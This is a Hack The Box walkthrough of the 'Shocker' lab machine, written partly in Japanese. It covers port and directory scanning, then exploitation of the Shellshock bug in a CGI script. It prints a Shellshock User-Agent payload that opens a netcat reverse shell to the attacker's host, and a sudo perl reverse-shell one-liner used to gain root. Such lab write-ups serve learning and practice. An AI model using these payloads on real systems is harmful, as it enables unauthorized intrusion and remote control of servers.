Hack The Box shocker
shocker
tags: HTB
Easy
Procedure
enumeration
- nmap scan
PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA) | 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA) |_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
GET / HTTP/1.1 Host: 10.10.10.56 HTTP/1.1 200 OK Date: Sat, 20 Mar 2021 23:44:56 GMT Server: Apache/2.4.18 (Ubuntu) Last-Modified: Fri, 22 Sep 2017 20:01:19 GMT ETag: "89-559ccac257884" Accept-Ranges: bytes Content-Length: 137 Vary: Accept-Encoding Content-Type: text/html <!DOCTYPE html> <html> <body> <h2>Don't Bug Me!</h2> <img src="bug.jpg" alt="bug" style="width:450px;height:350px;"> </body> </html>
コンテンツは見つからなかった。
- 80/tcp nikto
/opt/nikto/program/nikto.pl -h 10.10.10.56 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.56 + Target Hostname: 10.10.10.56 + Target Port: 80 + Start Time: 2021-03-20 21:19:52 (GMT9) --------------------------------------------------------------------------- + Server: Apache/2.4.18 (Ubuntu) + The anti-clickjacking X-Frame-Options header is not present. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. + Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.46). Apache 2.2.34 is the EOL for the 2.x branch. + Server may leak inodes via ETags, header found with file /, inode: 89, size: 559ccac257884, mtime: gzip + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS + OSVDB-3233: /icons/README: Apache default file found. + 8862 requests: 0 error(s) and 6 item(s) reported on remote host + End Time: 2021-03-20 21:53:04 (GMT9) (1992 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
特に大きな情報はなし
dirb http://10.10.10.56 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sat Mar 20 21:15:08 2021 URL_BASE: http://10.10.10.56/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.56/ ---- + http://10.10.10.56/cgi-bin/ (CODE:403|SIZE:294) + http://10.10.10.56/index.html (CODE:200|SIZE:137) + http://10.10.10.56/server-status (CODE:403|SIZE:299) ----------------- END_TIME: Sat Mar 20 21:30:31 2021 DOWNLOADED: 4612 - FOUND: 3
/cgi-bin/ディレクトリを発見
$ python3 dirsearch.py -e "cgi,sh,py,txt,bin" -u http://10.10.10.56/cgi-bin/ _|. _ _ _ _ _ _|_ v0.4.1 (_||| _) (/_(_|| (_| ) Extensions: cgi, sh, py, txt, bin | HTTP method: GET | Threads: 30 | Wordlist size: 10944 Error Log: /home/ubu/Downloads/dirsearch/logs/errors-21-03-04_00-49-49.log Target: http://10.10.10.56/cgi-bin/ Output File: /home/ubu/Downloads/dirsearch/reports/10.10.10.56/cgi-bin_21-03-04_00-49-51.txt [00:49:51] Starting: [00:50:06] 403 - 310B - /cgi-bin/.htaccess.sample [00:50:06] 403 - 308B - /cgi-bin/.htaccess.orig [00:50:06] 403 - 305B - /cgi-bin/.ht_wsr.txt [00:50:06] 403 - 308B - /cgi-bin/.htaccess.bak1 [00:50:06] 403 - 307B - /cgi-bin/.htaccessOLD2 [00:50:06] 403 - 306B - /cgi-bin/.htaccessOLD [00:50:06] 403 - 309B - /cgi-bin/.htaccess_extra [00:50:06] 403 - 306B - /cgi-bin/.htaccessBAK [00:50:06] 403 - 308B - /cgi-bin/.htpasswd_test [00:50:06] 403 - 308B - /cgi-bin/.htaccess.save [00:50:06] 403 - 308B - /cgi-bin/.htaccess_orig [00:50:06] 403 - 298B - /cgi-bin/.htm [00:50:06] 403 - 304B - /cgi-bin/.htpasswds [00:50:06] 403 - 305B - /cgi-bin/.httr-oauth [00:50:07] 403 - 299B - /cgi-bin/.html [00:50:07] 403 - 306B - /cgi-bin/.htaccess_sc [00:52:37] 200 - 118B - /cgi-bin/user.sh
user.shファイルを発見
GET /cgi-bin/user.sh HTTP/1.1 Host: 10.10.10.56 HTTP/1.1 200 OK Date: Sat, 20 Mar 2021 23:55:58 GMT Server: Apache/2.4.18 (Ubuntu) Content-Type: text/x-sh Content-Length: 118 Content-Type: text/plain Just an uptime test script 19:55:58 up 11:41, 0 users, load average: 0.00, 0.00, 0.00
特に何もなさそう、、、
- 80/tcp 再びnikto
$ nikto /opt/nikto/program/nikto.pl -h 10.10.10.56/cgi-bin/user.sh
誤検知で色々出てくるが、shellshockの脆弱性を発見。
GET /cgi-bin/user.sh/ HTTP/1.1 Host: 10.10.10.56 Referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; } User-Agent: () { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo; Connection: close HTTP/1.1 200 OK Date: Sat, 20 Mar 2021 12:35:53 GMT Server: Apache/2.4.18 (Ubuntu) 93e4r0-CVE-2014-6278: true Connection: close Content-Type: text/x-sh Content-Length: 150 93e4r0-CVE-2014-6271: true Content-Type: text/plain Just an uptime test script 08:35:53 up 21 min, 0 users, load average: 0.00, 0.01, 0.00
exploit
- shellshockの脆弱性を使ってリバースシェルを取得 自端末でリスナーを作成
$ nc -lnvp 4445
shellshockを利用したリクエスト送信
[OSCP](https://oscp.infosecsanyam.in/shells/linux-reverse-shell-one-liner)ありがとう
GET /cgi-bin/user.sh/ HTTP/1.1 Host: 10.10.10.56 User-Agent: () { :;}; echo; /bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.3 4445 >/tmp/f' Connection: close
$ whoami shelly
privilege escalation
User shelly may run the following commands on Shocker: (root) NOPASSWD: /usr/bin/perl
perlがパスワードなしでroot権限で実行できる
$ whoami shelly $ sudo perl -e 'use Socket;$i="10.10.15.3";$p=4446;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
# whoami root
Closing
- 便利なツールに感謝